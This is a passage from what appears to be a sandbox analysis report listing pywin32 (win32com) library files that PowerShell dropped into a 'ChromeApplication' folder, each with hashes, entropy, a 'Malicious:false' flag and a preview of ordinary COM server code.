                                                                                                                                                                                                  Entropy (8bit):4.582156737415511
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:Y++AYcGgH1ErYMx+bwFvIZBWuDs+IS7INXN87n:Y++RcGEErYMx+bw5IZBpAtdQn
                                                                                                                                                                                                  MD5:2D6CEA590F0A95EA2A0DB27A216F4195
                                                                                                                                                                                                  SHA1:0C7EEEE558751176B574B8CD278D00B6AEC61C3A
                                                                                                                                                                                                  SHA-256:14F17FE2B55FDC8D3B8362F975DC24888585B9ADE97D92F458EA2BB9CDB9A38B
                                                                                                                                                                                                  SHA-512:0578DF531158C75AC232329773245342E0D27CA5F8E4EBC3F6C1A77E214A7BF04DC0FF1DFB78ACC1C910C351F0F04AB668F45268E30BAD3300975B3C735912CC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Exception Handling.. Exceptions... To better support COM exceptions, the framework allows for an instance to be.. raised. This instance may have a certain number of known attributes, which are.. translated into COM exception details..... This means, for example, that Python could raise a COM exception that includes details.. on a Help file and location, and a description for the user..... This module provides a class which provides the necessary attributes...""".import sys..import pythoncom...# Note that we derive from com_error, which derives from exceptions.Exception.# Also note that we dont support "self.args", as we dont support tuple-unpacking.class COMException(pythoncom.com_error):. """An Exception object that is understood by the framework... If the framework is presented with an exception of type class,. it looks for certain known attributes on this class to provide rich. error information to the caller... It should be noted that the framework supports provi

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\server\factory.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):850
                                                                                                                                                                                                  Entropy (8bit):4.815862014888664
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:/QNX5gdGqRokVs8c86r5VrIgyXDe+5trM:IF5gpRoOOrjrHEDxtrM
                                                                                                                                                                                                  MD5:5683E97DCD5F29A47F276FA99CDF7B3D
                                                                                                                                                                                                  SHA1:818F22170F5F2EF06D3E9E25B116640988AC780E
                                                                                                                                                                                                  SHA-256:921B1941F622F5C5A5D7C6189F4886A4CF6D95771AC0908BCAC72A36CFAEF9E1
                                                                                                                                                                                                  SHA-512:CF477E6DDA4BB34FB1ED41D3B107EFAF43450FC3CC836910CC4F517F86A099572E44D3B23D8507337D12368C3910147948785E7AABCEC8ADFA50BFA540F2FE00
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Class factory utilities..import pythoncom...def RegisterClassFactories(clsids, flags=None, clsctx=None):. """Given a list of CLSID, create and register class factories... Returns a list, which should be passed to RevokeClassFactories. """. if flags is None:. flags = pythoncom.REGCLS_MULTIPLEUSE | pythoncom.REGCLS_SUSPENDED. if clsctx is None:. clsctx = pythoncom.CLSCTX_LOCAL_SERVER. ret = []. for clsid in clsids:. # Some server append '-Embedding' etc. if clsid[0] not in ["-", "/"]:. factory = pythoncom.MakePyFactory(clsid). regId = pythoncom.CoRegisterClassObject(clsid, factory, clsctx, flags). ret.append((factory, regId)). return ret...def RevokeClassFactories(infos):. for factory, revokeId in infos:. pythoncom.CoRevokeClassObject(revokeId).

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\server\localserver.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1194
                                                                                                                                                                                                  Entropy (8bit):4.976463880953823
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:qEDDboYs/8GX9lwQGZLTqtxU8R76HPMX5h48yaaI12pFu2aBpNC:6ZXzwNZCtGU76vW5h/H2pFuri
                                                                                                                                                                                                  MD5:01E7B6FDA3635ABB6DAEEE50CDEED9F7
                                                                                                                                                                                                  SHA1:E41B28638F8A3EECB8D55F89EF9EA02A724CCED1
                                                                                                                                                                                                  SHA-256:EA66C96F055172DE3900929BF21D25CF9A97B207D5009AAF164BB6E7F6BAD10E
                                                                                                                                                                                                  SHA-512:62E01CAF0ADC3DF9CCCD45AE56A653B1DCAF5C8767BFDB8C81199DFBB8DAA83B19A78AC0F20D8D88B82CE947E2125DADDADDF46E8F83858A4A94736F4EEC9780
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# LocalServer .EXE support for Python..#.# This is designed to be used as a _script_ file by pythonw.exe.#.# In some cases, you could also use Python.exe, which will create.# a console window useful for debugging..#.# NOTE: When NOT running in any sort of debugging mode,.# 'print' statements may fail, as sys.stdout is not valid!!!..#.# Usage:.# wpython.exe LocalServer.py clsid [, clsid].import sys..sys.coinit_flags = 2.import pythoncom.import win32api.from win32com.server import factory..usage = """\.Invalid command line arguments..This program provides LocalServer COM support.for Python COM objects...It is typically run automatically by COM, passing as arguments.The ProgID or CLSID of the Python Server(s) to be hosted."""...def serve(clsids):. infos = factory.RegisterClassFactories(clsids).. pythoncom.EnableQuitMessage(win32api.GetCurrentThreadId()). pythoncom.CoResumeClassObjects().. pythoncom.PumpMessages().. factory.RevokeClassFactories(infos).. pythoncom.CoUnini

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\server\policy.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):33141
                                                                                                                                                                                                  Entropy (8bit):4.593543235743787
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:J5/q7N12KNQZlYN0wyC+NIW59VEERVLdrW0o2nBiUtv4xVCiDc:J5/qpkKulI+jW0o+vv4/o
                                                                                                                                                                                                  MD5:639A66364D8B6CA5B7E57BCAA86107CD
                                                                                                                                                                                                  SHA1:0961CA6A02895FEA1DB40C5B4EE82EE8EE90075F
                                                                                                                                                                                                  SHA-256:9978C536B37B9F73512A91D0E3FC99F55D1FED91FAFCB17AFA68E9F2BC5744E9
                                                                                                                                                                                                  SHA-512:E72F03CECD540C6006DA8CEFA4896709FB2F13AFD5CC9C492511725939974D6D21E7C9E74B0C7386DDE08114D24E05ABD72F166B5DF8C3EBE367CAD021AD820D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Policies ..Note that Dispatchers are now implemented in "dispatcher.py", but.are still documented here...Policies.. A policy is an object which manages the interaction between a public . Python object, and COM . In simple terms, the policy object is the . object which is actually called by COM, and it invokes the requested . method, fetches/sets the requested property, etc. See the . @win32com.server.policy.CreateInstance@ method for a description of. how a policy is specified or created... Exactly how a policy determines which underlying object method/property . is obtained is up to the policy. A few policies are provided, but you . can build your own. See each policy class for a description of how it . implements its policy... There is a policy that allows the object to specify exactly which . methods and properties will be exposed. There is also a policy that . will dynamically expose all Python methods and properties - even those . added after the object has been instantiat

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\server\register.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25076
                                                                                                                                                                                                  Entropy (8bit):4.659547425005804
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:7NT/CaIamuUGpr4ou56hqhmVyVqaxu+HgDFXwx/D9kkUkPl:7NT/GGpK5iqkVyV/xDupw9D9GkPl
                                                                                                                                                                                                  MD5:DC199C2F6BB9103A9D81A4FA4E90DF3D
                                                                                                                                                                                                  SHA1:B9741C7736A308334AEFE4AE425E298E99494AAE
                                                                                                                                                                                                  SHA-256:8D20A25015E4BC54CBFEEC727BFFD53D864D44FCB884C6B03BE6BEA247744AF5
                                                                                                                                                                                                  SHA-512:33328D661889C48B2767C400C31013402DED7D57B5C8F1FAA17C3BFF7EA2EA7024DFF0D1DFAEF6A124AB9FAA5A342805B880219BF6EA597A48C58A2221DB43F3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Utilities for registering objects...This module contains utility functions to register Python objects as.valid COM Servers. The RegisterServer function provides all information.necessary to allow the COM framework to respond to a request for a COM object,.construct the necessary Python object, and dispatch COM events...""".import os.import sys..import pythoncom.import win32api.import win32con.import winerror..CATID_PythonCOMServer = "{B3EF80D0-68E2-11D0-A689-00C04FD658FF}"...def _set_subkeys(keyName, valueDict, base=win32con.HKEY_CLASSES_ROOT):. hkey = win32api.RegCreateKey(base, keyName). try:. for key, value in valueDict.items():. win32api.RegSetValueEx(hkey, key, None, win32con.REG_SZ, value). finally:. win32api.RegCloseKey(hkey)...def _set_string(path, value, base=win32con.HKEY_CLASSES_ROOT):. "Set a string value in the registry.".. win32api.RegSetValue(base, path, win32con.REG_SZ, value)...def _get_string(path, base=win32con.HKEY_CLASSES

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\server\util.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6702
                                                                                                                                                                                                  Entropy (8bit):4.682014380050602
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:zbQehv+u6tEWC62LI2nTprmqQZuJqYHN6VNYxA7wd:HB+t46MI2lrmqQZuJqYHGNefd
                                                                                                                                                                                                  MD5:15D42CC3F4D36665BC50CEE6B3231E75
                                                                                                                                                                                                  SHA1:E5615F3EB48FEBAA76B1E7B7B274C202BD76D324
                                                                                                                                                                                                  SHA-256:0D8E925E710539EAFCCA76510034C2A046AA0F35B1CF557E7C5FE40A9BFE72BE
                                                                                                                                                                                                  SHA-512:658CE11A42C81C6BEB8B67CA016D590A99E6B858970C6B577BA2E464607CC621A7EA5F8FC9C00EDA0446C89C0D6281B346B3700A71EFD86F5E5C0127AB90BE61
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" General Server side utilities .""".import pythoncom.import winerror..from . import policy.from .exception import COMException...def wrap(ob, iid=None, usePolicy=None, useDispatcher=None):. """Wraps an object in a PyGDispatch gateway... Returns a client side PyI{iid} interface... Interface and gateway support must exist for the specified IID, as. the QueryInterface() method is used... """. if usePolicy is None:. usePolicy = policy.DefaultPolicy. if useDispatcher == 1: # True will also work here.. import win32com.server.dispatcher.. useDispatcher = win32com.server.dispatcher.DefaultDebugDispatcher. if useDispatcher is None or useDispatcher == 0:. ob = usePolicy(ob). else:. ob = useDispatcher(usePolicy, ob).. # get a PyIDispatch, which interfaces to PyGDispatch. ob = pythoncom.WrapObject(ob). if iid is not None:. ob = ob.QueryInterface(iid) # Ask the PyIDispatch if it supports it?. return ob...def unwra

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\servers\PythonTools.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1178
                                                                                                                                                                                                  Entropy (8bit):4.426483796070394
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:kG788TbzrcW/r7FZybFrKwipwBX4C77F3ugx9/HCZLG/h6eTerrNiXZM/2X6H/a+:kG788fzrcWD7FAbFrkOh4qTxi1k6e6Hj
                                                                                                                                                                                                  MD5:B06CC9A0DBAB570B5DB41637E1AD6573
                                                                                                                                                                                                  SHA1:81FADB18B9198660C1498BE715131A482310C0DB
                                                                                                                                                                                                  SHA-256:114DE154A15223D1AAD50FCCFF02493C796BF367F09E18130C8F2DD39BEBCA1B
                                                                                                                                                                                                  SHA-512:CB149B96E16445EEE13CAA1618FB4A0A07AB0D79A9DF317CDC0DDB649D593389E1F5682FA973FDAEB415F7277E1527CB23C4051A6D244BB60DC3E376ABF6CFDF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import sys.import time...class Tools:. _public_methods_ = ["reload", "adddir", "echo", "sleep"].. def reload(self, module):. if module in sys.modules:. from importlib import reload.. reload(sys.modules[module]). return "reload succeeded.". return "no reload performed.".. def adddir(self, dir):. if type(dir) == type(""):. sys.path.append(dir). return str(sys.path).. def echo(self, arg):. return repr(arg).. def sleep(self, t):. time.sleep(t)...if __name__ == "__main__":. from win32com.server.register import RegisterServer, UnregisterServer.. clsid = "{06ce7630-1d81-11d0-ae37-c2fa70000000}". progid = "Python.Tools". verprogid = "Python.Tools.1". if "--unregister" in sys.argv:. print("Unregistering..."). UnregisterServer(clsid, progid, verprogid). print("Unregistered OK"). else:. print("Registering COM server..."). RegisterServer(.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\servers\dictionary.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4463
                                                                                                                                                                                                  Entropy (8bit):4.745656083351947
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:Nce3k70ArkQThivNM1/vNMpU81BALecPRvHrl04rOpFCnlN/w:NcG+d4u13u+LRpCFCnlhw
                                                                                                                                                                                                  MD5:EB469879CD0B5D622321D44327FF67C7
                                                                                                                                                                                                  SHA1:EC40C6F0114B449480B576CDE088235946C70372
                                                                                                                                                                                                  SHA-256:F3A6EC518C93D52BEF1AEB589EA369008A8072F959F85341BAF8D4BE2CE45F29
                                                                                                                                                                                                  SHA-512:D94BD462CA97223AEE52EF14DBBCD78835D588F5B1959169DE8E013990E408DD4FB0A0A30DE0A13585676D7B726D34B2F9E32157C50F87CFE08D4CE551F0A85D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Python.Dictionary COM Server...This module implements a simple COM server that acts much like a Python.dictionary or as a standard string-keyed VB Collection. The keys of.the dictionary are strings and are case-insensitive...It uses a highly customized policy to fine-tune the behavior exposed to.the COM client...The object exposes the following properties:.. int Count (readonly). VARIANT Item(BSTR key) (propget for Item). Item(BSTR key, VARIANT value) (propput for Item).. Note that 'Item' is the default property, so the following forms of. VB code are acceptable:.. set ob = CreateObject("Python.Dictionary"). ob("hello") = "there". ob.Item("hi") = ob("HELLO")..All keys are defined, returning VT_NULL (None) if a value has not been.stored. To delete a key, simply assign VT_NULL to the key...The object responds to the _NewEnum method by returning an enumerator over.the dictionary's keys. This allows for the following

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\servers\interp.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1664
                                                                                                                                                                                                  Entropy (8bit):4.854103740699842
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:FMw3KxRNHwFrJKuXHIvL2n2qcqZLBHUvUVjvIC0u9/w:FM4KxR6FrJKoIzQIqZLBfjQC0u9/w
                                                                                                                                                                                                  MD5:043481AD1E25C1417AE87C27B647F87D
                                                                                                                                                                                                  SHA1:83B216E7DB147EEA48365225668F2B26ABE102AF
                                                                                                                                                                                                  SHA-256:865C5BACB0CD3EBE596AAA08F9DD7D7DDE9B203ACD4A1637E8920ED986555395
                                                                                                                                                                                                  SHA-512:71B9DC8ADBA9ED91E48D49E5A9A5F30F6C74E666CE280E386F23E0FBC6D2EDCB26194B9E7411409886DE71F6DC8CCB78C65DE48223778062604B4EE2F0AF9652
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Python.Interpreter COM Server.. This module implements a very very simple COM server which. exposes the Python interpreter... This is designed more as a demonstration than a full blown COM server.. General functionality and Error handling are both limited... To use this object, ensure it is registered by running this module. from Python.exe. Then, from Visual Basic, use "CreateObject('Python.Interpreter')",. and call its methods!."""..import winerror.from win32com.server.exception import Exception...# Expose the Python interpreter..class Interpreter:. """The interpreter object exposed via COM""".. _public_methods_ = ["Exec", "Eval"]. # All registration stuff to support fully automatic register/unregister. _reg_verprogid_ = "Python.Interpreter.2". _reg_progid_ = "Python.Interpreter". _reg_desc_ = "Python Interpreter". _reg_clsid_ = "{30BD3490-2632-11cf-AD5B-524153480001}". _reg_class_spec_ = "win32com.servers.interp.Interpreter".. def __init__(self)

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\servers\perfmon.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1164
                                                                                                                                                                                                  Entropy (8bit):4.9132762177228235
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:I39k2E5hMQqvpdIGvzga+2Sk2vcSV4yWQSzCGfGQqklrGUMrDHlIpeXZM/Q/HN:wC2E5hMQqhdIGvg2R2vc0WQlGfGGtGh3
                                                                                                                                                                                                  MD5:FC57DB2AB422A0FBBF19FAEE627A7036
                                                                                                                                                                                                  SHA1:4AD31007AFDE4FBAED826C514CE860C61D599204
                                                                                                                                                                                                  SHA-256:5B3BE0A4E996218ACB5305D94685B8752B17C32F006859876973A3B8AABE7A45
                                                                                                                                                                                                  SHA-512:5A011AE1FB0A93A6E0C6CB337878384E9A86165FDCDDC4864F38DE90739E7E5A5BA3E7C684065CD664736CFCA07DC8A607299955F36E99EB28B4808F4CDCB49E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""A COM Server which exposes the NT Performance monitor in a very rudimentary way..Usage from VB:..set ob = CreateObject("Python.PerfmonQuery")..freeBytes = ob.Query("Memory", "Available Bytes").""".import pythoncom.import win32pdhutil.import winerror.from win32com.server import exception, register...class PerfMonQuery:. _reg_verprogid_ = "Python.PerfmonQuery.1". _reg_progid_ = "Python.PerfmonQuery". _reg_desc_ = "Python Performance Monitor query object". _reg_clsid_ = "{64cef7a0-8ece-11d1-a65a-00aa00125a98}". _reg_class_spec_ = "win32com.servers.perfmon.PerfMonQuery". _public_methods_ = ["Query"].. def Query(self, object, counter, instance=None, machine=None):. try:. return win32pdhutil.GetPerformanceAttributes(. object, counter, instance, machine=machine. ). except win32pdhutil.error as exc:. raise exception.Exception(desc=exc.strerror). except TypeError as desc:. raise exception.Exc

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\servers\test_pycomtest.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5105
                                                                                                                                                                                                  Entropy (8bit):4.973183641509729
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:P3TP/djb7S6awwJdPeo1YaJ0BJ4Lk1bfvM6:fTP/17jawwfPEaJ6J4LkdfvM6
                                                                                                                                                                                                  MD5:8F95097AEDD504D036DADE45C6379215
                                                                                                                                                                                                  SHA1:A74546A08C65A5D86819ECD7125E54C8AD76EF5F
                                                                                                                                                                                                  SHA-256:9DF8CD7887DE8A6676B164603FF136FA455B31CA893CBF9FC05C44604F98D73E
                                                                                                                                                                                                  SHA-512:78876D96E9773EED3EBEEB7E448C7A9E9D2915F440644FC08B1060FB3EA99087F3FFB7C4BB0040DE692BD2FE6A2F6592CEB9750F3CAE68EB60A996415FD1492E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This is part of the Python test suite..# The object is registered when you first run the test suite..# (and hopefully unregistered once done ;-)..import pythoncom.import winerror..# Ensure the vtables in the tlb are known..from win32com import universal.from win32com.client import constants, gencache.from win32com.server.exception import COMException.from win32com.server.util import wrap..pythoncom.__future_currency__ = True.# We use the constants from the module, so must insist on a gencache..# Otherwise, use of gencache is not necessary (tho still advised).gencache.EnsureModule("{6BCDCB60-5605-11D0-AE5F-CADD4C000000}", 0, 1, 1)...class PyCOMTest:. _typelib_guid_ = "{6BCDCB60-5605-11D0-AE5F-CADD4C000000}". _typelib_version = 1, 0. _com_interfaces_ = ["IPyCOMTest"]. _reg_clsid_ = "{e743d9cd-cb03-4b04-b516-11d3a81c1597}". _reg_progid_ = "Python.Test.PyCOMTest".. def DoubleString(self, str):. return str * 2.. def DoubleInOutString(self, str):. return

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\storagecon.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3029
                                                                                                                                                                                                  Entropy (8bit):5.133408473790648
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:mD5ZPfsTv+F3VJkSJ65MzlZCwDSfWtZItv+34hnraZDcu/LbFDwe5ZJoReRS4w:msT+Ff/GwDSf4ItM4rIDfzqimR+Pw
                                                                                                                                                                                                  MD5:F5C9F7C9D0DFD4D534CB514CBF4C88FB
                                                                                                                                                                                                  SHA1:BC4B8F8981DE8AEF0E78DB36B175838A0DF62729
                                                                                                                                                                                                  SHA-256:4EDC19EE04C728CE1090DA8B99C064D64402C5840D14B7FF7105F31D5CA4070D
                                                                                                                                                                                                  SHA-512:9AA3C5889AF5AB08EAFDE439A02478CBD620F959148A3AA4AFEE327C47683FB403451A4ADE312B5745A931ABEAF17563095000241433C8B256F63D70AE410312
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Constants related to IStorage and related interfaces..This file was generated by h2py from d:\msdev\include\objbase.h.then hand edited, a few extra constants added, etc.."""..STGC_DEFAULT = 0.STGC_OVERWRITE = 1.STGC_ONLYIFCURRENT = 2.STGC_DANGEROUSLYCOMMITMERELYTODISKCACHE = 4.STGC_CONSOLIDATE = 8..STGTY_STORAGE = 1.STGTY_STREAM = 2.STGTY_LOCKBYTES = 3.STGTY_PROPERTY = 4.STREAM_SEEK_SET = 0.STREAM_SEEK_CUR = 1.STREAM_SEEK_END = 2..LOCK_WRITE = 1.LOCK_EXCLUSIVE = 2.LOCK_ONLYONCE = 4..# Generated as from here...CWCSTORAGENAME = 32.STGM_DIRECT = 0x00000000.STGM_TRANSACTED = 0x00010000.STGM_SIMPLE = 0x08000000.STGM_READ = 0x00000000.STGM_WRITE = 0x00000001.STGM_READWRITE = 0x00000002.STGM_SHARE_DENY_NONE = 0x00000040.STGM_SHARE_DENY_READ = 0x00000030.STGM_SHARE_DENY_WRITE = 0x00000020.STGM_SHARE_EXCLUSIVE = 0x00000010.STGM_PRIORITY = 0x00040000.STGM_DELETEONRELEASE = 0x04000000.STGM_NOSCRATCH = 0x00100000.STGM_CREATE = 0x00001000.STGM_CONVERT = 0x00020000.STGM_FAILIFTHERE = 0x00000000.S

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\GenTestScripts.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2590
                                                                                                                                                                                                  Entropy (8bit):4.654726220942149
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:kVl/gO8KovhKT3DPvInCRHnr82dF6TVJ5roiPX/37wJId+c+AKpx+:igO8Lv8T3DYnCRHnr76TL5rVn3cqdn1Z
                                                                                                                                                                                                  MD5:858099A3F7A74841062D8C1B1A1DB7F4
                                                                                                                                                                                                  SHA1:9738A5C3347FDDC7DF945384137411185F6F35DF
                                                                                                                                                                                                  SHA-256:BCE0F5A6607A22A26914A2AAF41F24923F6ED4F576233745EF8FECB50B5EF7A6
                                                                                                                                                                                                  SHA-512:28F5685D39D643BFFA736E5008296FFB18B1EDB67F9903AEBC422E92AFEE90F4B40F0E6CB3321BD5E4C3ACCD0244200F0A9ACA2B824B2B503E97F63C06FD003A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# Generate scripts needed for serious testing!.#.import os.import sys..import pythoncom.import win32com.import win32com.client.makepy.import win32com.test..genList = [. ("msword8", "{00020905-0000-0000-C000-000000000046}", 1033, 8, 0),.]..genDir = "Generated4Test"...def GetGenPath():. import win32api.. return os.path.join(win32api.GetFullPathName(win32com.test.__path__[0]), genDir)...def GenerateFromRegistered(fname, *loadArgs):. # tlb = apply(pythoncom.LoadRegTypeLib, loadArgs). genPath = GetGenPath(). try:. os.stat(genPath). except os.error:. os.mkdir(genPath). # Ensure an __init__ exists.. open(os.path.join(genPath, "__init__.py"), "w").close(). print(fname, ": generating -", end=" "). f = open(os.path.join(genPath, fname + ".py"), "w"). win32com.client.makepy.GenerateFromTypeLibSpec(. loadArgs, f, bQuiet=1, bGUIProgress=1. ). f.close(). print("compiling -", end=" "). fullModName = "win32com.test.%s.%s" % (

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\Testpys.sct

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1058
                                                                                                                                                                                                  Entropy (8bit):5.068577848338502
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:8m0bEDXfv3Yqf+IJHDCMIRbcbze5a6A6aUCVOKDLL9KyK9pY:L0bELffYqf+eHDCMIRbcmSDLMyT
                                                                                                                                                                                                  MD5:00593753703D199D8A458373BE78B180
                                                                                                                                                                                                  SHA1:CEEC7AA7DD4CAF1CD93C76E192B67638DB46AE9B
                                                                                                                                                                                                  SHA-256:D8AB7F9E02B106A9B1701B01A698780D17903D3D538AD04B3203DA0BB8000AF5
                                                                                                                                                                                                  SHA-512:8FC0CB09FC18ECEEEE259316C3647E878FA25E6895F91A31E468B70B5F07A7E9296CB5D3B0E41CB9E98DAF5930F7F16A2A85D6B448171B1575E3B06F6EC0C18E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<scriptlet>..<Registration. Description="TestPys". ProgID="TestPys.Scriptlet". Version="1". ClassID="{2eeb6080-cd58-11d1-b81e-00a0240b2fef}">.. <SCRIPT LANGUAGE="VBScript"> ..Function Register()...Msgbox "Scriptlet 'Test' registered." ..End Function. ..Function Unregister()...Msgbox "Scriptlet 'Test' unregistered." ..End Function. </SCRIPT>.</Registration>..<implements id=Automation type=Automation>. <property name=PyProp1>. <get/>. <put/>. </property>. <property name=PyProp2>. <get/>. <put/>. </property>. <method name=PyMethod1>. </method>.. <method name=PyMethod2>. </method>.</implements>..<script language=python>..PyProp1 = "PyScript Property1";.PyProp2 = "PyScript Property2";..def get_PyProp1():. return PyProp1..def put_PyProp1(newValue):. global PyProp1. PyProp1 = newValue..def get_PyProp2():. return PyProp2..def put_PyProp2(newValue):. global PyProp2. PyProp2 = newValue..def PyMethod1():. return "PyMethod1 called"..def PyMethod2

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):43
                                                                                                                                                                                                  Entropy (8bit):4.1320441859950465
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:SN7cFxF0MCwmFU3xVW2:SNiCwyWVH
                                                                                                                                                                                                  MD5:7CCF7BECD3241B3DC1FCBD65FA78C5D3
                                                                                                                                                                                                  SHA1:5C97396B7F0E4A95FDD2975F9B37ADDA5D508451
                                                                                                                                                                                                  SHA-256:6FAD9353D6B72032692FEE2309B2FF70ED526B68AA7F0F10E2131E852C1E8301
                                                                                                                                                                                                  SHA-512:BDBDE0EBA39622B7A6F4764E8B28814BBEBA058F8A5412F751C41F051A79BE85E02F2B7CE99A71C210C75DCC3581F8963F3CD40157817F76F843251A1AC37663
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Empty file to designate a Python package.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\daodump.py

                                                                                                                                                                                                  Download File
